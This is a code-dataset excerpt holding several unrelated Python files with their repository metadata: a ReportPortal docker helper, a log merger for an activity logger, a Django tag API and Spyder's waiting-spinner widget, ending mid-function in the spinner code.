`CompletedProcess` for the
Raises:
`EnvironmentError` if process returns non-zero status code.
"""
__stop_containers()
__remove_containers()
remove_network_response = cli_utils.run_process([
'docker', 'network', 'rm', 'reportportal_default'
])
return remove_network_response
| 38.341463
| 119
| 0.6338
|
import platform
from pylenium.scripts import cli_utils
def __stop_containers():
command = 'docker stop $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
if platform.system() == 'Windows':
command = "FOR /f \"tokens=*\" %i IN " \
"('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
"DO docker stop %i"
stop_containers_response = cli_utils.run_process(command, shell=True)
if stop_containers_response.returncode != 0:
raise EnvironmentError(f'[FAILED] {command}'
'\n\nUnable to stop ReportPortal containers:'
'\n * Make sure Docker is installed and running'
'\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
f'\nResponse: {stop_containers_response}')
return stop_containers_response
def __remove_containers():
command = 'docker rm $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
if platform.system() == 'Windows':
command = "FOR /f \"tokens=*\" %i IN " \
"('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
"DO docker rm %i"
remove_containers_response = cli_utils.run_process(command, shell=True)
if remove_containers_response.returncode != 0:
raise EnvironmentError(f'[FAILED] {command}'
'\n\nUnable to remove ReportPortal containers after stopping them.'
f'\nResponse: {remove_containers_response}')
return remove_containers_response
def download_compose_yaml_file():
response = cli_utils.run_process([
'curl', 'https://raw.githubusercontent.com/reportportal/reportportal/master/docker-compose.yml',
'-o', './docker-compose.report-portal.yml'
])
if response.returncode != 0:
raise ConnectionError(f'\n\nUnable to download docker-compose file from ReportPortal repo. '
f'\nResponse: {response}')
return response
def compose_up():
response = cli_utils.run_process([
'docker-compose', '-p', 'reportportal',
'-f', 'docker-compose.report-portal.yml',
'up', '-d', '--force-recreate'
])
if response.returncode != 0:
raise EnvironmentError('\n\nUnable to run "docker-compose" command to create ReportPortal instance.'
'\n * Make sure Docker is installed and running'
'\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
f'\nResponse: {response}')
return response
def down():
__stop_containers()
__remove_containers()
remove_network_response = cli_utils.run_process([
'docker', 'network', 'rm', 'reportportal_default'
])
return remove_network_response
| true
| true
|
f71925bd9fe55e2d80c707e532175799b9940cd4
| 147
|
py
|
Python
|
src/radical/pilot/worker/__init__.py
|
eirrgang/radical.pilot
|
ceccd1867dd172935d602ff4c33a5ed4467e0dc8
|
[
"MIT"
] | 47
|
2015-03-16T01:08:11.000Z
|
2022-02-02T10:36:39.000Z
|
src/radical/pilot/worker/__init__.py
|
eirrgang/radical.pilot
|
ceccd1867dd172935d602ff4c33a5ed4467e0dc8
|
[
"MIT"
] | 1,856
|
2015-01-02T09:32:20.000Z
|
2022-03-31T21:45:06.000Z
|
src/radical/pilot/worker/__init__.py
|
eirrgang/radical.pilot
|
ceccd1867dd172935d602ff4c33a5ed4467e0dc8
|
[
"MIT"
] | 28
|
2015-06-10T18:15:14.000Z
|
2021-11-07T04:36:45.000Z
|
__copyright__ = "Copyright 2016, http://radical.rutgers.edu"
__license__ = "MIT"
from .update import Update
from .stager import Stager
| 16.333333
| 60
| 0.714286
|
__copyright__ = "Copyright 2016, http://radical.rutgers.edu"
__license__ = "MIT"
from .update import Update
from .stager import Stager
| true
| true
|
f71925dc3984013ee3e549051b9ebf44316eb766
| 8,888
|
py
|
Python
|
exe/modules/Merger.py
|
KagenoMoheji/ActiveTabGanttLogger
|
2d7c88e1c48d56126904d14e780a2588c69336fc
|
[
"MIT"
] | null | null | null |
exe/modules/Merger.py
|
KagenoMoheji/ActiveTabGanttLogger
|
2d7c88e1c48d56126904d14e780a2588c69336fc
|
[
"MIT"
] | null | null | null |
exe/modules/Merger.py
|
KagenoMoheji/ActiveTabGanttLogger
|
2d7c88e1c48d56126904d14e780a2588c69336fc
|
[
"MIT"
] | null | null | null |
import os
import sys
import platform
import datetime
from modules.Public import StrFormatter
class Merger:
currdir = ""
mergedir = ""
run_merge = {
"active_tab": False,
"mouse": False,
"keyboard": False
}
strfmr = None
def __init__(self):
'''
Merge logs in folders in "ganttlogger_logs".
'''
self.strfmr = StrFormatter()
# Check whether current folder name is "ganttlogger_logs"
self.currdir = os.getcwd()
is_win = "Windows" in platform.platform(terse=True)
curr_name = ""
if is_win:
curr_name = self.currdir.split("\\")[-1]
else:
curr_name = self.currdir.split("/")[-1]
if curr_name != "ganttlogger_logs":
print(self.strfmr.get_colored_console_log("red",
"Error: You must move to a folder 'ganttlogger_logs'."))
sys.exit()
self.mergedir = "{currdir}/merged_{datetime}".format(currdir=self.currdir, datetime=datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
def start(self):
try:
select_log_names = set(["active_tab", "mouse", "keyboard"])
while True:
print(self.strfmr.get_colored_console_log("yellow",
"Select 'all' or names separated by ',' from ('active_tab'|'mouse'|'keyboard').: "), end="")
input_select = list(map(lambda s: s.strip(), (input().strip()).split(",")))
if not input_select[0]:
print(self.strfmr.get_colored_console_log("red",
"Error: Invalid input."))
continue
elif "all" in input_select:
if len(input_select) == 1:
self.run_merge["active_tab"] = True
self.run_merge["mouse"] = True
self.run_merge["keyboard"] = True
break
else:
print(self.strfmr.get_colored_console_log("red",
"Error: Too many select despite 'all'."))
continue
else:
xor_select = set(input_select) ^ select_log_names
if len(xor_select) == 0 or \
all(x in select_log_names for x in xor_select):
if "active_tab" in input_select:
self.run_merge["active_tab"] = True
if "mouse" in input_select:
self.run_merge["mouse"] = True
if "keyboard" in input_select:
self.run_merge["keyboard"] = True
break
else:
print(self.strfmr.get_colored_console_log("red",
"Error: There are some invalid names."))
continue
# Create new folder where is outputted merged logs
os.makedirs(os.path.dirname("{}/".format(self.mergedir)), exist_ok=True)
print("Created an output folder '{}'.".format(self.mergedir))
self.run()
except KeyboardInterrupt:
print("Exit")
sys.exit()
def run(self):
# Get dictionary of directorys in a folder "ganttlogger_logs" except for directorys including "merged" in its name.
log_folders = {f: None for f in os.listdir(self.currdir) if (os.path.isdir(os.path.join(self.currdir, f))) and (not "merged" in f)}
#
remove_keys_list = []
for key in log_folders.keys():
readme = "{dir}/{folder}/README.txt".format(dir=self.currdir, folder=key)
if not os.path.exists(readme):
remove_keys_list.append(key)
continue
# Read from text file until appearing 'StartDate' till 4 rows.
has_startdate = False
row_startdate = ""
with open(readme, "r", encoding="utf-8") as f:
for row in range(4):
row_startdate = f.readline()
if "StartDate" in row_startdate:
has_startdate = True
break
if not has_startdate: # If README.txt doesn't have a row "StartDate".
print(self.strfmr.get_colored_console_log("yellow",
"Warning: File '{readme}' doesn't have a row 'StartDate'.".format(readme=readme)))
remove_keys_list.append(key)
continue
# Add value of "StartDate" to list
try:
log_folders[key] = datetime.datetime.strptime((row_startdate.split(": ")[-1]).strip(), "%Y/%m/%d %H:%M:%S.%f")
except ValueError:
print(self.strfmr.get_colored_console_log("red",
"Error: Invalid format of a value of 'StartDate' in {readme}.".format(readme=readme)))
sys.exit()
# Remove values in specific keys in "log_folders"
for k in remove_keys_list:
log_folders.pop(k)
# Sort "log_folders" by datetime of values in ASC
log_folders = dict(sorted(log_folders.items(), key=lambda x:x[1]))
# print("""
# log_folders: {log_folders}
# """.format(log_folders=log_folders))
if self.run_merge["active_tab"]:
self.merge_active_tab_logs(log_folders)
if self.run_merge["mouse"]:
self.merge_mouse_logs(log_folders)
if self.run_merge["keyboard"]:
self.merge_keyboard_logs(log_folders)
def merge_active_tab_logs(self, sorted_folders_dict):
with open("{mergedir}/active_tab.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("StartTime]:+:[ApplicationName]:+:[TabText\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/active_tab.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip() # Remove the last "\n"
splitted_log = log.split("\n", 1)
if "StartTime]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("ActiveTab merged!")
def merge_mouse_logs(self, sorted_folders_dict):
with open("{mergedir}/mouse.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("Time]:+:[MoveDistance\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/mouse.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip() # Remove the last "\n"
splitted_log = log.split("\n", 1)
if "Time]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("Mouse merged!")
def merge_keyboard_logs(self, sorted_folders_dict):
with open("{mergedir}/keyboard.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("Time]:+:[PressCount\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/keyboard.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip() # Remove the last "\n"
splitted_log = log.split("\n", 1)
if "Time]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("Keyboard merged!")
| 48.568306
| 143
| 0.507426
|
import os
import sys
import platform
import datetime
from modules.Public import StrFormatter
class Merger:
currdir = ""
mergedir = ""
run_merge = {
"active_tab": False,
"mouse": False,
"keyboard": False
}
strfmr = None
def __init__(self):
self.strfmr = StrFormatter()
self.currdir = os.getcwd()
is_win = "Windows" in platform.platform(terse=True)
curr_name = ""
if is_win:
curr_name = self.currdir.split("\\")[-1]
else:
curr_name = self.currdir.split("/")[-1]
if curr_name != "ganttlogger_logs":
print(self.strfmr.get_colored_console_log("red",
"Error: You must move to a folder 'ganttlogger_logs'."))
sys.exit()
self.mergedir = "{currdir}/merged_{datetime}".format(currdir=self.currdir, datetime=datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
def start(self):
try:
select_log_names = set(["active_tab", "mouse", "keyboard"])
while True:
print(self.strfmr.get_colored_console_log("yellow",
"Select 'all' or names separated by ',' from ('active_tab'|'mouse'|'keyboard').: "), end="")
input_select = list(map(lambda s: s.strip(), (input().strip()).split(",")))
if not input_select[0]:
print(self.strfmr.get_colored_console_log("red",
"Error: Invalid input."))
continue
elif "all" in input_select:
if len(input_select) == 1:
self.run_merge["active_tab"] = True
self.run_merge["mouse"] = True
self.run_merge["keyboard"] = True
break
else:
print(self.strfmr.get_colored_console_log("red",
"Error: Too many select despite 'all'."))
continue
else:
xor_select = set(input_select) ^ select_log_names
if len(xor_select) == 0 or \
all(x in select_log_names for x in xor_select):
if "active_tab" in input_select:
self.run_merge["active_tab"] = True
if "mouse" in input_select:
self.run_merge["mouse"] = True
if "keyboard" in input_select:
self.run_merge["keyboard"] = True
break
else:
print(self.strfmr.get_colored_console_log("red",
"Error: There are some invalid names."))
continue
os.makedirs(os.path.dirname("{}/".format(self.mergedir)), exist_ok=True)
print("Created an output folder '{}'.".format(self.mergedir))
self.run()
except KeyboardInterrupt:
print("Exit")
sys.exit()
def run(self):
log_folders = {f: None for f in os.listdir(self.currdir) if (os.path.isdir(os.path.join(self.currdir, f))) and (not "merged" in f)}
remove_keys_list = []
for key in log_folders.keys():
readme = "{dir}/{folder}/README.txt".format(dir=self.currdir, folder=key)
if not os.path.exists(readme):
remove_keys_list.append(key)
continue
has_startdate = False
row_startdate = ""
with open(readme, "r", encoding="utf-8") as f:
for row in range(4):
row_startdate = f.readline()
if "StartDate" in row_startdate:
has_startdate = True
break
if not has_startdate:
print(self.strfmr.get_colored_console_log("yellow",
"Warning: File '{readme}' doesn't have a row 'StartDate'.".format(readme=readme)))
remove_keys_list.append(key)
continue
try:
log_folders[key] = datetime.datetime.strptime((row_startdate.split(": ")[-1]).strip(), "%Y/%m/%d %H:%M:%S.%f")
except ValueError:
print(self.strfmr.get_colored_console_log("red",
"Error: Invalid format of a value of 'StartDate' in {readme}.".format(readme=readme)))
sys.exit()
for k in remove_keys_list:
log_folders.pop(k)
log_folders = dict(sorted(log_folders.items(), key=lambda x:x[1]))
# log_folders: {log_folders}
# """.format(log_folders=log_folders))
if self.run_merge["active_tab"]:
self.merge_active_tab_logs(log_folders)
if self.run_merge["mouse"]:
self.merge_mouse_logs(log_folders)
if self.run_merge["keyboard"]:
self.merge_keyboard_logs(log_folders)
def merge_active_tab_logs(self, sorted_folders_dict):
with open("{mergedir}/active_tab.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("StartTime]:+:[ApplicationName]:+:[TabText\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/active_tab.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip()
splitted_log = log.split("\n", 1)
if "StartTime]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("ActiveTab merged!")
def merge_mouse_logs(self, sorted_folders_dict):
with open("{mergedir}/mouse.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("Time]:+:[MoveDistance\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/mouse.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip()
splitted_log = log.split("\n", 1)
if "Time]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("Mouse merged!")
def merge_keyboard_logs(self, sorted_folders_dict):
with open("{mergedir}/keyboard.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("Time]:+:[PressCount\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/keyboard.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip()
splitted_log = log.split("\n", 1)
if "Time]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("Keyboard merged!")
| true
| true
|
f7192642ac4e4ccc76acb1a05c82ae929b697a48
| 3,870
|
py
|
Python
|
website/src/globaly/rest_api.py
|
iamcholo/videoplatform
|
72dd1db73e1c940e5992dacbb63feb8fc11394e3
|
[
"Apache-2.0"
] | null | null | null |
website/src/globaly/rest_api.py
|
iamcholo/videoplatform
|
72dd1db73e1c940e5992dacbb63feb8fc11394e3
|
[
"Apache-2.0"
] | 9
|
2020-06-05T19:18:35.000Z
|
2022-03-11T23:30:50.000Z
|
website/src/globaly/rest_api.py
|
iamcholo/videoplatform
|
72dd1db73e1c940e5992dacbb63feb8fc11394e3
|
[
"Apache-2.0"
] | null | null | null |
import json
from django.conf import settings
from django.http import Http404, HttpResponseRedirect, HttpResponse
from django.conf.urls import url, include
from rest_framework import routers, serializers, viewsets, generics
from rest_framework import status
from rest_framework.decorators import api_view, authentication_classes, permission_classes
from rest_framework.response import Response
from rest_framework.parsers import JSONParser
from rest_framework import generics
from globaly.models import GlobalyTags
from django.contrib.auth.models import User
from user.rest_authentication import IsAuthenticated
from django.db.models import Q
from decimal import Decimal as D
from django.db.models import Max
from django.utils.translation import ugettext_lazy as _
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
class GlobalyTagsSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = GlobalyTags
fields = (
'id',
'name',
'slug',
'meta_title',
'meta_description',
'publish',
'created',
'modified',
)
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def tag_list(request):
if request.method == 'GET':
tags = GlobalyTags.objects.filter(autor=request.user)
serializer = GlobalyTagsSerializer(
tags,
many=True,
context={'request': request}
)
return Response(serializer.data)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def tag_details(request):
if request.method == 'POST':
try:
pk = request.data.get('id')
tag = GlobalyTags.objects.get(
pk=pk
)
if tag.autor != request.user:
return Response(
status=status.HTTP_404_NOT_FOUND
)
except GlobalyTags.DoesNotExist:
return Response(
status=status.HTTP_404_NOT_FOUND
)
serializer = GlobalyTagsSerializer(
tag,
context={'request': request}
)
return Response(serializer.data)
return Response(
status=status.HTTP_204_NO_CONTENT
)
@api_view(['PUT','POST','DELETE'])
@permission_classes((IsAuthenticated,))
def tag(request):
if request.method == 'POST':
serializer = GlobalyTagsSerializer(
data=request.data,
context={'request': request}
)
if serializer.is_valid():
serializer.save(autor=request.user)
return Response(serializer.data)
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
if request.method == 'PUT' or request.method == 'DELETE':
try:
pk = request.data.get('id')
tag = GlobalyTags.objects.get(
pk=int(pk)
)
except GlobalyTags.DoesNotExist:
return Response(
status=status.HTTP_404_NOT_FOUND
)
if request.method == 'PUT':
serializer = GlobalyTagsSerializer(
tag,
data=request.data,
context={'request': request}
)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
if request.method == 'DELETE':
tag.delete()
return Response(
status=status.HTTP_204_NO_CONTENT
)
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
| 30.714286
| 90
| 0.605685
|
import json
from django.conf import settings
from django.http import Http404, HttpResponseRedirect, HttpResponse
from django.conf.urls import url, include
from rest_framework import routers, serializers, viewsets, generics
from rest_framework import status
from rest_framework.decorators import api_view, authentication_classes, permission_classes
from rest_framework.response import Response
from rest_framework.parsers import JSONParser
from rest_framework import generics
from globaly.models import GlobalyTags
from django.contrib.auth.models import User
from user.rest_authentication import IsAuthenticated
from django.db.models import Q
from decimal import Decimal as D
from django.db.models import Max
from django.utils.translation import ugettext_lazy as _
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
class GlobalyTagsSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = GlobalyTags
fields = (
'id',
'name',
'slug',
'meta_title',
'meta_description',
'publish',
'created',
'modified',
)
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def tag_list(request):
if request.method == 'GET':
tags = GlobalyTags.objects.filter(autor=request.user)
serializer = GlobalyTagsSerializer(
tags,
many=True,
context={'request': request}
)
return Response(serializer.data)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def tag_details(request):
if request.method == 'POST':
try:
pk = request.data.get('id')
tag = GlobalyTags.objects.get(
pk=pk
)
if tag.autor != request.user:
return Response(
status=status.HTTP_404_NOT_FOUND
)
except GlobalyTags.DoesNotExist:
return Response(
status=status.HTTP_404_NOT_FOUND
)
serializer = GlobalyTagsSerializer(
tag,
context={'request': request}
)
return Response(serializer.data)
return Response(
status=status.HTTP_204_NO_CONTENT
)
@api_view(['PUT','POST','DELETE'])
@permission_classes((IsAuthenticated,))
def tag(request):
if request.method == 'POST':
serializer = GlobalyTagsSerializer(
data=request.data,
context={'request': request}
)
if serializer.is_valid():
serializer.save(autor=request.user)
return Response(serializer.data)
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
if request.method == 'PUT' or request.method == 'DELETE':
try:
pk = request.data.get('id')
tag = GlobalyTags.objects.get(
pk=int(pk)
)
except GlobalyTags.DoesNotExist:
return Response(
status=status.HTTP_404_NOT_FOUND
)
if request.method == 'PUT':
serializer = GlobalyTagsSerializer(
tag,
data=request.data,
context={'request': request}
)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
if request.method == 'DELETE':
tag.delete()
return Response(
status=status.HTTP_204_NO_CONTENT
)
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
| true
| true
|
f719265545a7052a735de005b48163850981877d
| 8,764
|
py
|
Python
|
spyder/widgets/waitingspinner.py
|
suokunlong/spyder
|
2d5d450fdcef232fb7f38e7fefc27f0e7f704c9a
|
[
"MIT"
] | 3
|
2019-09-27T21:00:00.000Z
|
2021-03-07T23:28:32.000Z
|
spyder/widgets/waitingspinner.py
|
jastema/spyder
|
0ef48ea227c53f57556cd8002087dc404b0108b0
|
[
"MIT"
] | 3
|
2020-10-13T21:15:23.000Z
|
2020-10-13T21:15:24.000Z
|
spyder/widgets/waitingspinner.py
|
jastema/spyder
|
0ef48ea227c53f57556cd8002087dc404b0108b0
|
[
"MIT"
] | 2
|
2021-04-30T01:18:22.000Z
|
2021-09-19T06:31:42.000Z
|
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2012-2014 Alexander Turkin
Copyright (c) 2014 William Hallatt
Copyright (c) 2015 Jacob Dawid
Copyright (c) 2016 Luca Weiss
Copyright (c) 2017- Spyder Project Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
See NOTICE.txt in the Spyder repository root for more detailed information.
Minimally adapted from waitingspinnerwidget.py of the
`QtWaitingSpinner Python Fork <https://github.com/z3ntu/QtWaitingSpinner>`_.
A port of `QtWaitingSpinner <https://github.com/snowwlex/QtWaitingSpinner>`_.
"""
import math
from qtpy.QtCore import QRect, Qt, QTimer
from qtpy.QtGui import QColor, QPainter
from qtpy.QtWidgets import QWidget
class QWaitingSpinner(QWidget):
def __init__(self, parent, centerOnParent=True,
disableParentWhenSpinning=False, modality=Qt.NonModal):
# super().__init__(parent)
QWidget.__init__(self, parent)
self._centerOnParent = centerOnParent
self._disableParentWhenSpinning = disableParentWhenSpinning
# WAS IN initialize()
self._color = QColor(Qt.black)
self._roundness = 100.0
self._minimumTrailOpacity = 3.14159265358979323846
self._trailFadePercentage = 80.0
self._trailSizeDecreasing = False
self._revolutionsPerSecond = 1.57079632679489661923
self._numberOfLines = 20
self._lineLength = 10
self._lineWidth = 2
self._innerRadius = 10
self._currentCounter = 0
self._isSpinning = False
self._timer = QTimer(self)
self._timer.timeout.connect(self.rotate)
self.updateSize()
self.updateTimer()
self.hide()
# END initialize()
self.setWindowModality(modality)
self.setAttribute(Qt.WA_TranslucentBackground)
def paintEvent(self, QPaintEvent):
self.updatePosition()
painter = QPainter(self)
painter.fillRect(self.rect(), Qt.transparent)
painter.setRenderHint(QPainter.Antialiasing, True)
if self._currentCounter >= self._numberOfLines:
self._currentCounter = 0
painter.setPen(Qt.NoPen)
for i in range(0, self._numberOfLines):
painter.save()
painter.translate(self._innerRadius + self._lineLength, self._innerRadius + self._lineLength)
rotateAngle = float(360 * i) / float(self._numberOfLines)
painter.rotate(rotateAngle)
painter.translate(self._innerRadius, 0)
distance = self.lineCountDistanceFromPrimary(i, self._currentCounter, self._numberOfLines)
color = self.currentLineColor(distance, self._numberOfLines, self._trailFadePercentage,
self._minimumTrailOpacity, self._color)
# Compute the scaling factor to apply to the size and thickness
# of the lines in the trail.
if self._trailSizeDecreasing:
sf = (self._numberOfLines - distance) / self._numberOfLines
else:
sf = 1
painter.setBrush(color)
rect = QRect(0, round(-self._lineWidth / 2),
round(sf * self._lineLength),
round(sf * self._lineWidth))
painter.drawRoundedRect(
rect, self._roundness, self._roundness, Qt.RelativeSize)
painter.restore()
def start(self):
self.updatePosition()
self._isSpinning = True
self.show()
if self.parentWidget and self._disableParentWhenSpinning:
self.parentWidget().setEnabled(False)
if not self._timer.isActive():
self._timer.start()
self._currentCounter = 0
def stop(self):
self._isSpinning = False
self.hide()
if self.parentWidget() and self._disableParentWhenSpinning:
self.parentWidget().setEnabled(True)
if self._timer.isActive():
self._timer.stop()
self._currentCounter = 0
def setNumberOfLines(self, lines):
self._numberOfLines = lines
self._currentCounter = 0
self.updateTimer()
def setLineLength(self, length):
self._lineLength = length
self.updateSize()
def setLineWidth(self, width):
self._lineWidth = width
self.updateSize()
def setInnerRadius(self, radius):
self._innerRadius = radius
self.updateSize()
def color(self):
return self._color
def roundness(self):
return self._roundness
def minimumTrailOpacity(self):
return self._minimumTrailOpacity
def trailFadePercentage(self):
return self._trailFadePercentage
def revolutionsPersSecond(self):
return self._revolutionsPerSecond
def numberOfLines(self):
return self._numberOfLines
def lineLength(self):
return self._lineLength
def isTrailSizeDecreasing(self):
"""
Return whether the length and thickness of the trailing lines
are decreasing.
"""
return self._trailSizeDecreasing
def lineWidth(self):
return self._lineWidth
def innerRadius(self):
return self._innerRadius
def isSpinning(self):
return self._isSpinning
def setRoundness(self, roundness):
self._roundness = max(0.0, min(100.0, roundness))
def setColor(self, color=Qt.black):
self._color = QColor(color)
def setRevolutionsPerSecond(self, revolutionsPerSecond):
self._revolutionsPerSecond = revolutionsPerSecond
self.updateTimer()
def setTrailFadePercentage(self, trail):
self._trailFadePercentage = trail
def setTrailSizeDecreasing(self, value):
"""
Set whether the length and thickness of the trailing lines
are decreasing.
"""
self._trailSizeDecreasing = value
def setMinimumTrailOpacity(self, minimumTrailOpacity):
self._minimumTrailOpacity = minimumTrailOpacity
def rotate(self):
self._currentCounter += 1
if self._currentCounter >= self._numberOfLines:
self._currentCounter = 0
self.update()
def updateSize(self):
size = int((self._innerRadius + self._lineLength) * 2)
self.setFixedSize(size, size)
def updateTimer(self):
self._timer.setInterval(int(1000 / (self._numberOfLines *
self._revolutionsPerSecond)))
def updatePosition(self):
if self.parentWidget() and self._centerOnParent:
self.move(int(self.parentWidget().width() / 2 -
self.width() / 2),
int(self.parentWidget().height() / 2 -
self.height() / 2))
def lineCountDistanceFromPrimary(self, current, primary, totalNrOfLines):
distance = primary - current
if distance < 0:
distance += totalNrOfLines
return distance
def currentLineColor(self, countDistance, totalNrOfLines, trailFadePerc, minOpacity, colorinput):
color = QColor(colorinput)
if countDistance == 0:
return color
minAlphaF = minOpacity / 100.0
distanceThreshold = int(math.ceil((totalNrOfLines - 1) * trailFadePerc / 100.0))
if countDistance > distanceThreshold:
color.setAlphaF(minAlphaF)
else:
alphaDiff = color.alphaF() - minAlphaF
gradient = alphaDiff / float(distanceThreshold + 1)
resultAlpha = color.alphaF() - gradient * countDistance
# If alpha is out of bounds, clip it.
resultAlpha = min(1.0, max(0.0, resultAlpha))
color.setAlphaF(resultAlpha)
return color
| 34.368627
| 105
| 0.655294
|
import math
from qtpy.QtCore import QRect, Qt, QTimer
from qtpy.QtGui import QColor, QPainter
from qtpy.QtWidgets import QWidget
class QWaitingSpinner(QWidget):
def __init__(self, parent, centerOnParent=True,
disableParentWhenSpinning=False, modality=Qt.NonModal):
QWidget.__init__(self, parent)
self._centerOnParent = centerOnParent
self._disableParentWhenSpinning = disableParentWhenSpinning
self._color = QColor(Qt.black)
self._roundness = 100.0
self._minimumTrailOpacity = 3.14159265358979323846
self._trailFadePercentage = 80.0
self._trailSizeDecreasing = False
self._revolutionsPerSecond = 1.57079632679489661923
self._numberOfLines = 20
self._lineLength = 10
self._lineWidth = 2
self._innerRadius = 10
self._currentCounter = 0
self._isSpinning = False
self._timer = QTimer(self)
self._timer.timeout.connect(self.rotate)
self.updateSize()
self.updateTimer()
self.hide()
self.setWindowModality(modality)
self.setAttribute(Qt.WA_TranslucentBackground)
def paintEvent(self, QPaintEvent):
self.updatePosition()
painter = QPainter(self)
painter.fillRect(self.rect(), Qt.transparent)
painter.setRenderHint(QPainter.Antialiasing, True)
if self._currentCounter >= self._numberOfLines:
self._currentCounter = 0
painter.setPen(Qt.NoPen)
for i in range(0, self._numberOfLines):
painter.save()
painter.translate(self._innerRadius + self._lineLength, self._innerRadius + self._lineLength)
rotateAngle = float(360 * i) / float(self._numberOfLines)
painter.rotate(rotateAngle)
painter.translate(self._innerRadius, 0)
distance = self.lineCountDistanceFromPrimary(i, self._currentCounter, self._numberOfLines)
color = self.currentLineColor(distance, self._numberOfLines, self._trailFadePercentage,
self._minimumTrailOpacity, self._color)
if self._trailSizeDecreasing:
sf = (self._numberOfLines - distance) / self._numberOfLines
else:
sf = 1
painter.setBrush(color)
rect = QRect(0, round(-self._lineWidth / 2),
round(sf * self._lineLength),
round(sf * self._lineWidth))
painter.drawRoundedRect(
rect, self._roundness, self._roundness, Qt.RelativeSize)
painter.restore()
def start(self):
self.updatePosition()
self._isSpinning = True
self.show()
if self.parentWidget and self._disableParentWhenSpinning:
self.parentWidget().setEnabled(False)
if not self._timer.isActive():
self._timer.start()
self._currentCounter = 0
def stop(self):
self._isSpinning = False
self.hide()
if self.parentWidget() and self._disableParentWhenSpinning:
self.parentWidget().setEnabled(True)
if self._timer.isActive():
self._timer.stop()
self._currentCounter = 0
def setNumberOfLines(self, lines):
